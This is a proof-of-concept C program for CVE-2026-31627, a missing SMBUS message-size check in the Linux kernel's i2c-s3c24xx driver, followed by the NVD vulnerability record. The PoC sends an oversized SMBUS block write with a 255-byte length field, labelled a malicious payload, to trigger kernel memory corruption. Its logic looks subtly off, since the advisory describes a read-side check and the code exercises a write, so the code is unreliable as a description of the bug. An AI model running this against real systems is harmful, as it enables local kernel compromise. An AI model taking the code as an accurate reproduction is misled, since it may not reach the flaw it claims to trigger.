CVE-2026-31627

/* * PoC for CVE-2026-31627: Linux Kernel i2c-s3c24xx SMBUS Size Check Missing * This is a conceptual PoC demonstrating how to trigger the vulnerability. * It requires a system with the vulnerable i2c-s3c24xx driver. */ #include <stdio.h> #include <fcntl.h> #include <linux/i2c-dev.h> #include <linux/i2c.h> #include <sys/ioctl.h> #include <unistd.h> #define I2C_SMBUS_BLOCK_MAX 32 int main() { int file; int adapter_nr = 1; /* Replace with the actual I2C bus number */ char filename[20]; __u8 buf[128]; struct i2c_smbus_ioctl_data args; union i2c_smbus_data data; snprintf(filename, 19, "/dev/i2c-%d", adapter_nr); file = open(filename, O_RDWR); if (file < 0) { perror("Failed to open i2c bus"); return 1; } // Set a slave address (replace with a valid address on the bus) if (ioctl(file, I2C_SLAVE, 0x50) < 0) { perror("Failed to set slave address"); close(file); return 1; } // Prepare malicious payload // The first byte is the length. We set it to a value > I2C_SMBUS_BLOCK_MAX // to trigger the missing size check vulnerability. memset(data.block, 0x41, sizeof(data.block)); data.block[0] = 0xFF; // Malicious size: 255, exceeding I2C_SMBUS_BLOCK_MAX (32) args.read_write = I2C_SMBUS_WRITE; args.command = 0x00; args.size = I2C_SMBUS_BLOCK_DATA; args.data = &data; printf("Sending malicious SMBUS block write with size %d...\n", data.block[0]); // This ioctl triggers the vulnerable code path if (ioctl(file, I2C_SMBUS, &args) < 0) { perror("Ioctl failed (device might not support this or error occurred)"); } else { printf("Ioctl succeeded. If vulnerable, kernel memory corruption may have occurred.\n"); } close(file); return 0; }

{"cve": {"id": "CVE-2026-31627", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:42.003", "lastModified": "2026-04-27T20:43:43.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: s3c24xx: check the size of the SMBUS message before using it\n\nThe first byte of an i2c SMBUS message is the size, and it should be\nverified to ensure that it is in the range of 0..I2C_SMBUS_BLOCK_MAX\nbefore processing it.\n\nThis is the same logic that was added in commit a6e04f05ce0b (\"i2c:\ntegra: check msg length in SMBUS block read\") to the i2c tegra driver."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.10.1", "versionEndExcluding": "6.6.136", "matchCriteriaId": "FB898C76-28CD-416F-9777-F00444862F17"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.10:-:*:*:*:*:*:*", "matchCriteriaId": "82D28405-E1F2-43CF-AA38-B228805AFFF9"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/377fae22a137b6b89f3f32399a58c52cf2325416", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/71b3c316b22c555d2769126a92b1244b15a9750d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aaaaec39ddbcd06770dca7f1adebc3b1242ebe7b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0128c7157d639a931353ea344fb44aad6d6e17a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d87d5620125a03b1eadbd5df39748215d3db7ddb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fa00738ab30b07db1a43b9c85fc56b8cc3b7d197", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}